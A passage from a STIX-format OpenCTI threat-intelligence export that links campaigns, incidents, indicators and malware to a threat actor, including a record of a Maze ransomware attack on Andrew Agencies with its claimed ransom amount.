"x_opencti_source_ref": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:04.921Z",
"modified": "2020-02-05T10:06:04.921Z",
"x_opencti_first_seen": "2020-02-05T10:06:04.921Z",
"x_opencti_last_seen": "2020-02-05T10:06:04.921Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "68b09d26-2acb-44d4-9f46-606a2126e8b5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c3b77fd7-ca97-49cd-a456-55a84e5dbfb0",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:25:23.591Z",
"modified": "2020-01-07T14:25:23.591Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "32cc1b75-c06c-4496-8936-f5eab8abdc3c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dee7e50e-824d-454a-93e2-034aa7234977",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:39:25.904Z",
"modified": "2020-01-07T14:39:25.904Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ad4fdf09-8ac3-45e9-bc8a-f24870567555",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--163d2fe5-2f5d-4b90-9c8e-2938d27e6ed8",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:38:59.211Z",
"modified": "2020-01-07T14:38:59.211Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8757c553-604a-43ab-8a4b-1c87af7ccbe4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--fe3b22f8-caf6-4297-addd-8ead11501140",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:51:01.682Z",
"modified": "2020-02-04T14:51:01.682Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8c135e8b-99ad-4d20-b2fd-018383275d63",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--00d6f9a5-ba28-4c36-aa96-6a895c0f59d3",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"created": "2020-02-04T15:22:04.023Z",
"modified": "2020-02-04T15:22:04.023Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b8fd5c74-acea-4ba2-8c31-d0339619a94d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f194dfc2-1bb0-4aab-9200-87071915f98e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-08T16:04:37.951Z",
"modified": "2020-01-08T16:04:37.951Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0a07f67c-0b0e-4afb-8cf7-d77d7a6eb2a4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--a79bd633-8557-4c5b-8381-24ea5795b0d1",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-04T16:06:09.092Z",
"modified": "2020-02-04T16:06:09.092Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8040f346-08e9-4a37-8447-59f7290ff66a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--a79dd61a-17db-4744-92d3-04f51f2d0337",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T09:20:22.427Z",
"modified": "2020-02-05T09:20:22.427Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a6c82516-0345-4334-b180-1798a0873646"
},
{
"id": "relationship--3ccd9fb3-48d9-47b8-bb1d-f3abff658a7d",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T09:45:57.291Z",
"modified": "2020-02-05T09:45:57.291Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ba3732c5-c652-4779-88d9-6ec4a0578209",
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--d8e74e08-bb66-4fd5-b3cd-5c79c397bf0d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:54.076Z",
"modified": "2020-02-05T10:04:54.076Z",
"x_opencti_first_seen": "2020-02-05T10:04:54.076Z",
"x_opencti_last_seen": "2020-02-05T10:04:54.076Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a79c56bf-cbe1-46bc-8473-7e9a5a24ef86",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--75f5674b-2500-475a-aa55-6f77fa6ab9f7",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:06.017Z",
"modified": "2020-02-05T10:05:06.017Z",
"x_opencti_first_seen": "2020-02-05T10:05:06.017Z",
"x_opencti_last_seen": "2020-02-05T10:05:06.017Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7d2b2d7d-9190-4cc0-b817-ce364e9a9029",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c093a59f-7770-4ab1-8ea9-d2a1b6d8494f",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:11.921Z",
"modified": "2020-02-05T10:05:11.921Z",
"x_opencti_first_seen": "2020-02-05T10:05:11.921Z",
"x_opencti_last_seen": "2020-02-05T10:05:11.921Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1165660f-1898-44a0-84be-97ca6ce8c35c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d345dfdc-78d4-4473-b960-246c87a2698b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:17.378Z",
"modified": "2020-02-05T10:05:17.378Z",
"x_opencti_first_seen": "2020-02-05T10:05:17.378Z",
"x_opencti_last_seen": "2020-02-05T10:05:17.378Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b989d21-405d-418a-bf8c-209f4079ef72",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--33e0e467-ed31-42f7-8939-1b07cd379eef",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:26.022Z",
"modified": "2020-02-05T10:05:26.022Z",
"x_opencti_first_seen": "2020-02-05T10:05:26.022Z",
"x_opencti_last_seen": "2020-02-05T10:05:26.022Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ebdefda0-56fb-433b-bfea-64365bb5c6f1",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--6823218c-aa3c-4d09-965f-17725774d37b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:41.167Z",
"modified": "2020-02-05T10:05:41.167Z",
"x_opencti_first_seen": "2020-02-05T10:05:41.167Z",
"x_opencti_last_seen": "2020-02-05T10:05:41.167Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "408232ad-f2b2-4a3e-9990-1ac1873576a3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--3fc721da-63c0-4366-b3fb-44fca7aa4e59",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:49.754Z",
"modified": "2020-02-05T10:05:49.754Z",
"x_opencti_first_seen": "2020-02-05T10:05:49.754Z",
"x_opencti_last_seen": "2020-02-05T10:05:49.754Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b254d7d-3724-4da9-8048-49f4e3bad9f2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--10f038ce-870a-4203-a972-661a383cbd06",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:59.249Z",
"modified": "2020-02-05T10:05:59.249Z",
"x_opencti_first_seen": "2020-02-05T10:05:59.249Z",
"x_opencti_last_seen": "2020-02-05T10:05:59.249Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8fbb5920-0ec5-4ecc-9629-2850f1f528a8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0d4b8802-e9ab-4a81-9b4f-6893e8c72165",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T14:31:49.477Z",
"modified": "2020-02-04T14:31:49.477Z",
"x_opencti_first_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b8dc512d-7d59-41b0-b4f0-d6dbdf28e4cd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--f86b3029-477d-456c-b69e-7f957e9a0ecc",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:44:10.984Z",
"modified": "2020-02-04T14:44:10.984Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9b9cee87-d817-4f42-a877-1ae083d55408",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
},
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
}
]
},
{
"id": "relationship--f830e01a-1d45-42fc-86bc-49bde9def60b",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:39:37.369Z",
"modified": "2020-01-07T14:39:37.369Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-06T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d2671217-cd63-4fab-ae5d-8f424e07ce3f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--e6676409-e7ad-4100-91df-175868b93131",
"type": "relationship",
"relationship_type": "uses",
"description": "files encryption",
"source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"target_ref": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"x_opencti_source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_target_ref": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"created": "2020-02-04T15:00:26.917Z",
"modified": "2020-02-04T15:00:26.917Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9b61352d-d22e-4062-8caf-9fb69245c0d6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--c424d6d1-2338-4ce5-bf3b-e3c15494eb23",
"type": "relationship",
"relationship_type": "uses",
"description": "Maze's Threat Actor claimed Andrew Agencies was attacked on October 21st, 2019 when they breached their network and encrypted 245 computers.\nRansom amount asked : $1.1M",
"source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:05:50.672Z",
"modified": "2020-02-04T15:05:50.672Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a2e9cb49-ff37-4bfc-8843-08e6fdf1bfc5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--7b58b77e-b69d-462e-8a48-a37403ab6e66",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"target_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_target_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"created": "2020-02-04T15:06:46.692Z",
"modified": "2020-02-04T15:06:46.692Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d5305338-d7fd-469b-9e48-a73706ed2f1b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--35bb7efc-ff99-4ae2-8edf-609306dcdd38",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:11:22.149Z",
"modified": "2020-02-04T15:11:22.149Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7afb1062-d2b7-4146-8285-c989b0521cd7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--384e4106-3db3-441f-aa4b-36205f49d2c8",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"target_ref": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"x_opencti_source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_target_ref": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"created": "2020-01-08T16:06:41.139Z",
"modified": "2020-01-08T16:06:41.139Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "acec4cc4-7f3f-49dd-a8bf-d4c0d82688da",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--8660671e-4e14-42a9-9582-c9b933e40367",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:39:35.496Z",
"modified": "2020-02-04T15:39:35.496Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d16b43b6-a217-4a18-84a4-328acf76f3e2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--4900c69b-95cb-4eac-a012-aa0cc971d523",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"target_ref": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"x_opencti_source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_target_ref": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"created": "2020-02-04T15:49:28.190Z",
"modified": "2020-02-04T15:49:28.190Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2d660703-778b-4c55-99ac-63995adc2410",
